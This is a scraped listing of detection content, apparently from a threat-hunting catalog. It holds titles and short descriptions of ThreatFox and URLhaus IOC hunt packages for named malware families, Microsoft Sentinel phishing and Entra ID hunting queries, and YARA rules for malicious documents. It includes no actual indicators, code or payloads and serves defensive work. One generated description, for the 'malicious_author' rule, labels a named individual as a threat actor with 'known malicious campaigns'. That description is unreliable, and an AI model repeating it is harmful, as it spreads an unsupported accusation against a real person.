CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 43 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DanaBot IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with DanaBot

iocthreatfoxwin-danabot
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents

The Remus malware family is designed to exfiltrate sensitive data and establish persistence within compromised systems, often

iocthreatfoxwin-remus
ThreatFox: Sliver IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Sliver

iocthreatfoxwin-sliver
ThreatFox source
UrlClickEvents

Hunt package for 3 IOCs associated with SmokeLoader

iocthreatfoxwin-smokeloader
ThreatFox: Tofsee IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Tofsee

iocthreatfoxwin-tofsee
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 46 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with VShell

iocthreatfoxwin-vshell
Tofu Backdoor
yara low
Yara-Rules source

The T

backdoorcommunity
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises emails submitted as false negatives by admins where the emails were already detected by MDO but there was an admin policy override

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises emails submitted by admins as false negatives, summarizing the data by top 10 sender domains of those emails

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises emails submitted by admins as false positives, summarizing the data by top 10 sender domains of those emails

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the top admins performing false negative submissions

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the top admins performing false positive submissions

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query graphs top accounts performing user submissions

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises top outbound recipient domains by outbound email volume and shows total number of inbound emails with Threats from the same domains (as inbound senders)

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

Total Submissions by Submission State

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

Total Submissions by Submission Type

huntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 27 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as c2-monitor-auto

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as CoinMiner

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as jar

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 37 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as WeedHack

iocurlhaus
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the daily amount of user false negative submissions by submission type, including phish simulations reported by users.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises user submissions type compared to admin review verdict

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises user submissions where admin also performed 'mark and notify' action on the submission

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the total amount of user false negative submissions by submission type, including reported phish simulation emails

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualises the total amount of user false negative or false positive submissions by the verdict of the submission grading.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query visualises the total amount of user false negative submissions from the junk folder

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query visualises emails submitted as false negatives by users where the emails were already detected by MDO but there was an admin-defined policy override

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query visualises emails submitted as false negatives by users where the emails were already detected by MDO but there was a policy override.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query visualises top sender email addresses of inbound emails submitted as false negatives by users.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query visualises top sender domains of inbound emails submitted as false negatives by users.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query visualises top sender email addresses of intra-org emails submitted as false negatives by users.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query visualises top 10 subjects of intra-org emails submitted as false negatives by users.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsIdentityInfo

This query helps to find threats using display name impersonation for users not already protected with User Impersonation

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query provides insights into AIR investigation actions in Microsoft Defender for Office 365.

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
EmailEvents

This query visualises total inbound emails that have any bulk complaint level.

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
EmailAttachmentInfo

In this detection, we hunt for emails with randomly named attachments sent from the same sender to multiple recipients

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

In this detection, we track emails with suspicious keywords in subjects.

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

In this detection, we check the sender prevalence over the last 14 days and use the same to detect malicious activity via email containing QR code

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
EmailEvents

This query helps review incoming email messages where the Display Name of the sender contains the organization's own or a partner company/brand name.

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
EmailEvents

This query visualises total inbound emails with Spam detections.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises top 10 users targeted with Spam.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total inbound emails with Spam detections summarizing the data by the top 15 email sender P2 domain (SenderFromDomain).

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises top 15 users targeted with Spam with summarized spam detections.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

In this query, we hunt for inbound emails delivered having URLs from QR codes

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

In this query, we hunt for inbound emails having URLs from QR codes and suspicious keywords in subject

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

In this query, we hunt for inbound emails having URLs from QR codes and sent by non-prevalent senders.

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query helps review messages released from Quarantine, grouped by detection type. Useful to see what is leading to the largest number of messages being released.

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query shows information about high confidence phish email that has been released from the Quarantine.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailAttachmentInfoEmailEvents

In this detection approach, we correlate email from non-prevalent senders in the organization with impersonation intents

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

In this detection, we use the "Email reported by user as malware or phish" MDO alert as a starting point to identify the scope of a campaign.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish (BEC) Impersonation detections by Detection Technology

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish (BEC) Impersonation detections by Detection Technology over time

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

In this query, we summarize volume of inbound emails with QR code URLs in last 30 days

huntingmicrosoftofficial
is elf
yara low
Yara-Rules source

YARA rule: is__elf

community
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
EmailEvents

Listing Email Remediation Actions performed via Explorer in Defender for Office 365

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
EmailEvents

In this detection, we track emails with personalized subjects.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

In this detection, we track emails with personalized subjects.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises the total amount of phish emails that are quarantined, summarized by the detection method

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises the amount of phish emails that are quarantined, summarized daily by the detection method

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEventsEmailEvents

This query shows information about email that has been released from the Quarantine in Defender for Office 365.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query helps review the quarantine release trend in Defender for Office 365.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises emails released from quarantine and summarizes the result by the original filter verdict.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises the total amount of spam emails that are quarantined, summarized by the detection method

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises the amount of spam emails that are quarantined, summarized daily by the detection method

huntingmicrosoftofficial
Azure-Sentinel source
T1566

In this detection, we hunt for any sign-in attempt from a non-managed, non-compliant, untrusted device.

huntingmicrosoftofficial
Yara-Rules source

Identifies RTFs with potential shellcode

community
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spam detections over time summarizing the data daily by Delivery Location.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spam detections summarizing the data by email sender IP address (SenderIPv4, SenderIPv6).

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spam detections summarizing the data by various Spam detection technologies/controls.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spam detections over time summarizing the data daily

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spam detections over time by various Spam Detection technologies/controls.

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Azure-Sentinel source
T1566
CloudAppEvents

This detection approach correlates a user accessing an email with image/document attachments and a risky sign-in attempt from non-trusted devices.

huntingmicrosoftofficialphishing
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Mirai is a DDoS botnet malware that infects IoT devices to launch

elf-miraiiocthreatfox
ThreatFox: PerlBot IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with PerlBot

elf-perlbotiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 8 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 6 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 22 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
UrlClickEvents

Hunt package for 2 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 37 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 10 IOCs associated with CobaltMirage FRP

iocthreatfoxwin-cobaltmirage_tunnel
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

DCRat is a remote access trojan that enables attackers to exfiltrate data and

backdooriocthreatfoxwin-dcrat
ThreatFox: Lumar IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 6 IOCs associated with Lumar

iocthreatfoxwin-lumar
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 5 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with SectopRAT

backdooriocthreatfoxwin-sectop_rat
ThreatFox: Stealc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 2 IOCs associated with Stealc

iocthreatfoxwin-stealc
ThreatFox source
DnsEvents

Hunt package for 8 IOCs associated with StrelaStealer

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 19 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 82 IOCs associated with VShell

iocthreatfoxwin-vshell
Azure-Sentinel source
T1566
EmailEvents

This query visualises total inbound emails which have any Bulk complaint level.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total inbound emails with Phish detections summarizing the data by the top recipient email address (RecipientEmailAddress)

huntingmicrosoftofficial
Yara-Rules source

CommentCrew-threat-apt1

aptcommunity
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 37 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 15 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 17 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 19 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 25 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as unknown

iocurlhaus
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish detections over time summarizing the data daily by Phish detection technologies/controls used for detecting unknown-unique phish

huntingmicrosoftofficial
Azure-Sentinel source
T1528T1098
AuditLogs

Hunting query that identifies admin consent grants to Entra ID applications. Admin consent (also referred to as tenant-wide consent) allows an administrator to authorize an application to access resou

backdoorhuntingmicrosoftofficialpersistencephishing
Azure-Sentinel source
T1528
AuditLogs

Hunting query that identifies Entra ID application registrations and updates where one or more redirect URIs (reply URLs) point to an external domain that is not a trusted Microsoft endpoint, localhos

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

This query helps surface phishing campaigns associated with Appspot abuse.

huntingmicrosoftofficialphishing
Azure-Sentinel source
T1562.001T1556
AuditLogs

Hunting query that identifies Conditional Access policies that have been disabled or deleted. An attacker who obtains privileged access to an Entra ID tenant will commonly disable or delete CA policie

backdoorhuntinglateral-movementmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total inbound emails with Phish detections summarizing the data by the top email sender P2 domain (SenderFromDomain).

huntingmicrosoftofficial
Yara-Rules source

Detects an embedded executable in a non-executable file

community
Azure-Sentinel source
T1098.003
AuditLogs

Hunting query that identifies guest or external accounts being added to privileged Entra ID directory roles. External accounts are identified by the presence of #EXT# in the UserPrincipalName, which i

backdoorhuntingmicrosoftofficial
hancitor dropper
yara low
Yara-Rules source

YARA rule: hancitor_dropper

community
macrocheck
yara low
Yara-Rules source

YARA rule: macrocheck

community
Yara-Rules source

The 'maldoc

community
Yara-Rules source

YARA rule: maldoc_find_kernel32_base_method_1

community
Yara-Rules source

YARA rule: maldoc_find_kernel32_base_method_2

community
Yara-Rules source

YARA rule: maldoc_find_kernel32_base_method_3

community
Yara-Rules source

The 'maldoc_function_prolog_signature' rule detects malicious document code patterns associated with malware function prologs. SOC teams should deploy this rule in endpoint EDR scanning, email gateways, and file share monitoring to

community
Yara-Rules source

YARA rule: maldoc_getEIP_method_1

community
Yara-Rules source

YARA rule: maldoc_getEIP_method_4

community
Yara-Rules source

YARA rule: maldoc_indirect_function_call_1

community
Yara-Rules source

YARA rule: maldoc_indirect_function_call_2

community
Yara-Rules source

YARA rule: maldoc_indirect_function_call_3

community
Yara-Rules source

YARA rule: maldoc_structured_exception_handling

community
Yara-Rules source

YARA rule: maldoc_suspicious_strings

community
Yara-Rules source

Detect weaponized RTF documents with OLE2Link exploit

communityexploit
Yara-Rules source

MWI generated document

backdoorcommunity
Azure-Sentinel source
T1528
AuditLogs

Hunting query that identifies OAuth consent events where the granted permission scope includes high-risk delegated or application permissions, and where the target application has not been observed in

backdoorhuntingmicrosoftofficialphishing
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish detections over time summarizing the data daily by Delivery Location.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish detections summarizing the data by various Phish detection technologies/controls

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish detections over time summarizing the data daily by various Phish Detection technologies/controls

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises emails with Phish detections (High confidence) summarizing the data by Delivery Location.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises emails with Phish detections (Normal confidence) summarizing the data by Delivery Location.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish detections over time summarizing the data daily.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query helps hunt for possible device code Phishing attempts.

huntingmicrosoftofficialphishing
Punycode lookalikes
kql medium
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

Punycode lookalike domains in Emails and Teams messages

huntingmicrosoftofficial
ThreatFox source
DnsEvents

Hunt package for 46 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Cobalt Strike is a sophisticated malware used for persistent remote access, command-and-control (C2) communication, and executing payloads to exfiltrate data or move laterally within

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: Formbook IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Formbook

iocthreatfoxwin-formbook
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
UrlClickEvents

The Loki Password Stealer (PWS) is a malware family designed to exfiltrate sensitive credentials and system data by leveraging stolen

infostealeriocthreatfoxwin-lokipws
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox: NjRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with NjRAT

backdooriocthreatfoxwin-njrat
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 110 IOCs associated with Vidar

iocthreatfoxwin-vidar
Azure-Sentinel source
T1566
EmailEvents

This query helps in reviewing top policies for user overrides (Allow/Block)

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises the total amount of emails subject to an admin policy with action of allow, independent of action taken, summarizing the data by type of override

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises the amount of emails subject to an admin policy with action of block, summarizing the data daily

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises the amount of emails subject to a user type policy with action of allow, summarizing the data by type of override and threats type found

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises the amount of emails subject to a user type policy with action of block, summarizing the data daily

huntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 55 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 33 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as Mozi

iocurlhaus
BlackHole v2
yara low
Yara-Rules source

YARA rule: BlackHole_v2

community
Yara-Rules source

Detect a VBE file inside a byte sequence

community
Yara-Rules source

Dridex Malware in XML Document

community
Yara-Rules source

EmbeddedFiles were introduced in v1.3

community
Yara-Rules source

Flate was introduced in v1.2

community
Yara-Rules source

3.4.1, 'File Header' of Appendix H states that ' Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.' Therefore, if you see this trigger then any ot

community
Yara-Rules source

YARA rule: invalid_trailer_structure

community
Yara-Rules source

XObjects require v1.4+

community
Yara-Rules source

The first entry in a cross-reference table is always free and has a generation number of 65,535

backdoorcommunity
Yara-Rules source

JBIG2 was introduced in v1.4

community
Yara-Rules source

These are commonly used to split up JS code

community
Yara-Rules source

JavaScript was introduced in v1.3

community
malicious author
yara low
Yara-Rules source

The 'malicious_author' YARA rule detects files or artifacts associated with Glenn Edwards' known malicious campaigns, targeting indicators of compromise linked to his threat actor tactics. SOC teams should deploy this rule in endpoint EDR scanning, email gateways, and file share monitoring to identify and mitigate potential threats from this adversary.

community
Yara-Rules source

The 'multiple_filtering' YARA rule detects malware or payloads employing multiple filtering techniques to evade detection mechanisms. SOC teams should deploy this rule in endpoint EDR scanning, email gate

community
Yara-Rules source

Written very generically and doesn't hold any weight - just something that might be useful to know about to help show incremental updates to the file being analyzed

community
PDF Embedded Exe
yara low
Yara-Rules source

YARA rule: PDF_Embedded_Exe

community
possible exploit
yara low
Yara-Rules source

The 'possible_exploit' YARA rule detects potential malicious code or exploit artifacts commonly associated with advanced threats. SOC teams should deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify and mitigate exploit-related activities.

communityexploit
powershell
yara low
Yara-Rules source

This YARA rule detects malicious PowerShell scripts commonly used in cyberattacks. SOC teams should deploy it in endpoint EDR scanning, email gateway, and file share monitoring to identify and block suspicious PowerShell activity.

communitypowershell
ppaction
yara low
Yara-Rules source

YARA rule: ppaction

community
Yara-Rules source

The 'shellcode_blob_metadata' rule detects large Base64-encoded blobs in metadata fields, which are often indicative of embedded shellcode awaiting decoding. SOC teams should deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify potential malicious payloads.

community
Azure-Sentinel source
T1566
EmailEvents

This query helps in reviewing malicious emails allowed due to admin overrides

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps in reviewing malicious emails allowed due to user overrides

huntingmicrosoftofficial
Yara-Rules source

YARA rule: suspicious_author

community
Yara-Rules source

YARA rule: suspicious_creation

community
Yara-Rules source

YARA rule: suspicious_creator

community
suspicious embed
yara low
Yara-Rules source

YARA rule: suspicious_embed

community
suspicious js
yara low
Yara-Rules source

YARA rule: suspicious_js

community
Yara-Rules source

YARA rule: suspicious_launch_action

community
Yara-Rules source

The 'suspicious_obfuscation' rule detects obfuscated code or files that may hide malicious payloads, often used in evasion techniques. SOC teams should deploy this rule in endpoint EDR scanning, email gateway analysis, and file share monitoring to identify potential threats.

communityevasion
Yara-Rules source

YARA rule: suspicious_producer

community
Azure-Sentinel source
T1566

This query looks for Teams messages from an external user with a suspicious display name.

huntingmicrosoftofficial
suspicious title
yara low
Yara-Rules source

YARA rule: suspicious_title

community
Yara-Rules source

The 'suspicious_version' YARA rule detects files with known malicious versions or variants associated with malware families. SOC teams

community
Azure-Sentinel source
T1562
CloudAppEvents

This query visualises the daily amount of admin false negative Teams message submissions by submission type of Phish or Malware

huntingmicrosoftofficial
Azure-Sentinel source
T1562
CloudAppEvents

This query visualises the daily amount of admin false positive Teams message submissions

huntingmicrosoftofficial
Azure-Sentinel source
T1566
CloudAppEvents

This query visualizes Teams messages submitted by users or admins then graded in the submission process.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
UrlClickEvents

This query visualizes the daily amount of blocked Url clicks performed by users on Urls in Teams messages.

huntingmicrosoftofficial
Teams Malware ZAP
kql medium
Azure-Sentinel source
T1566

This query helps hunt for Teams messages with Malware threats that have been ZAPed.

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious Teams message with a URL from OpenPhish was delivered.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEventsEmailUrlInfo

This query helps hunt for Teams messages that have been ZAPed with the same URL in Email.

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query helps hunt for Teams messages from a specific sender by ThreadType.

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query helps hunt for Teams messages with suspicious URL domains.

huntingmicrosoftofficial
Teams Phish ZAP
kql medium
Azure-Sentinel source
T1566

This query helps hunt for Teams messages with Phish threats that have been ZAPed.

huntingmicrosoftofficial
Azure-Sentinel source
T1566

This query visualizes the daily amount of post delivery events on Teams messages.

huntingmicrosoftofficial
Teams Spam ZAP
kql medium
Azure-Sentinel source
T1566

